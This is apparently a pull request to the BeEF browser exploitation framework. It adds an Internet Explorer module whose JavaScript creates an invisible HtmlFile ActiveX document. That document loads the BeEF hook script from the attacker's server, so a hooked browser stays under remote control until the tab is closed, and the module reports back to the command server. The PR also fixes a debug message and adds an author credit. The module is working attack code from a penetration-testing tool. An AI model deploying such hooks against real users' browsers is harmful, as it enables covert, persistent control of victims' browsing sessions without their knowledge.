### PR TITLE
Add Invisible HTMLFile ActiveX persistence module

### DIFF
--- a/modules/persistence/invisible_htmlfile_activex/command.js
+++ b/modules/persistence/invisible_htmlfile_activex/command.js
@@ -22,7 +22,7 @@ beef.execute(function() {
     window.open("","_self");
     beef.net.send("<%= @command_url %>", <%= @command_id %>, "success=created HTMLFile ActiveX object", beef.are.status_success());
   } catch (e) {
-    beef.debug("[Invisible HTMLFile ActiveX] could not hijack opener window: "+e.message)
+    beef.debug("[Invisible HTMLFile ActiveX] could not create HTMLFile ActiveX object: "+e.message)
     beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=could not create HTMLFile ActiveX object: " + e.message, beef.are.status_error());
   }
 });

--- a/modules/persistence/invisible_htmlfile_activex/command.js
+++ b/modules/persistence/invisible_htmlfile_activex/command.js
@@ -1,0 +1,28 @@
+//
+// Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  try {
+    var hook_url = beef.net.httpproto + '://' + beef.net.host+ ':' + beef.net.port + beef.net.hook;
+
+    // create HMTL document
+    beef.debug("[Invisible HTMLFile ActiveX] Creating HTMLFile ActiveX object");
+    doc = new ActiveXObject("HtmlFile");
+    doc.open();
+    doc.write('<html><body><script src="'+hook_url+'"><\/script></body></html>');
+    doc.close();
+
+    // Save a self-reference
+    doc.Script.doc = doc;
+ 
+    // Prevent IE from destroying the previous reference
+    window.open("","_self");
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "success=created HTMLFile ActiveX object", beef.are.status_success());
+  } catch (e) {
+    beef.debug("[Invisible HTMLFile ActiveX] could not hijack opener window: "+e.message)
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=could not create HTMLFile ActiveX object: " + e.message, beef.are.status_error());
+  }
+});

--- a/modules/persistence/invisible_htmlfile_activex/config.yaml
+++ b/modules/persistence/invisible_htmlfile_activex/config.yaml
@@ -1,0 +1,19 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        invisible_htmlfile_activex:
+            enable: true
+            category: "Persistence"
+            name: "Invisible HTMLFile (ActiveX)"
+            description: "This module uses a <i>HTMLFile</i> ActiveX object to create an invisible HTML document containing a BeEF hook. The hook persists until the tab is closed. Internet Explorer only.<br/><br/> Based on <a href='https://www.brokenbrowser.com/zombie-alert/'>research</a> by <a href='https://twitter.com/magicmac2000'>@MagicMac2000</a>."
+            authors: ["bcoles"]
+            target:
+                working:
+                    IE:
+                        min_ver: 11
+                        max_ver: latest
+                not_working: ["All"]

--- a/modules/persistence/invisible_htmlfile_activex/config.yaml
+++ b/modules/persistence/invisible_htmlfile_activex/config.yaml
@@ -10,7 +10,7 @@ beef:
             category: "Persistence"
             name: "Invisible HTMLFile (ActiveX)"
             description: "This module uses a <i>HTMLFile</i> ActiveX object to create an invisible HTML document containing a BeEF hook. The hook persists until the tab is closed. Internet Explorer only.<br/><br/> Based on <a href='https://www.brokenbrowser.com/zombie-alert/'>research</a> by <a href='https://twitter.com/magicmac2000'>@MagicMac2000</a>."
-            authors: ["bcoles"]
+            authors: ["bcoles", "@MagicMac2000"]
             target:
                 working:
                     IE:

--- a/modules/persistence/invisible_htmlfile_activex/module.rb
+++ b/modules/persistence/invisible_htmlfile_activex/module.rb
@@ -1,0 +1,10 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Invisible_htmlfile_activex < BeEF::Core::Command
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+end


### PR DESCRIPTION
This PR adds a persistence module for Internet Explorer using a `HtmlFile` ActiveX control.

More information: https://www.brokenbrowser.com/zombie-alert/

Fix #1363 
